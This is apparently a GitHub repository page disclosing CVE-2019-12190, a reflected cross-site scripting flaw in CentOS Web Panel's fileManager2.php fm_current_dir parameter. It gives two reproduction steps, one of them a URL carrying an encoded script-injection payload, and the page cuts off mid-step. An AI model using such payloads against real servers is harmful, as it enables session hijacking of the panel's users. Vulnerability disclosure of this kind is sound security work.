Skip to content
CVE-2019-12190 - CentOS-WebPanel XSS vulnerability
Branch: master
Clone or download
Latest commit f19c2c5 May 20, 2019
Type Name Latest commit message Commit time
Failed to load latest commit information.


CVE-2019-12190 - CentOS-WebPanel XSS vulnerability

Information Description:XSS was discovered in (aka CWP) CentOS Web Panel through via the testacc/fileManager2.php fm_current_dir parameter.

Researcher: Enter of VinCSS (Vingroup)


  1. Login into the CentOS Web Panel using user credential.
  2. Access link frame=2&fm_current_dir=/%3C/script%3E%3Cscript%3Ealert(XSS);%3C/script%3E or
You can’t perform that action at this time.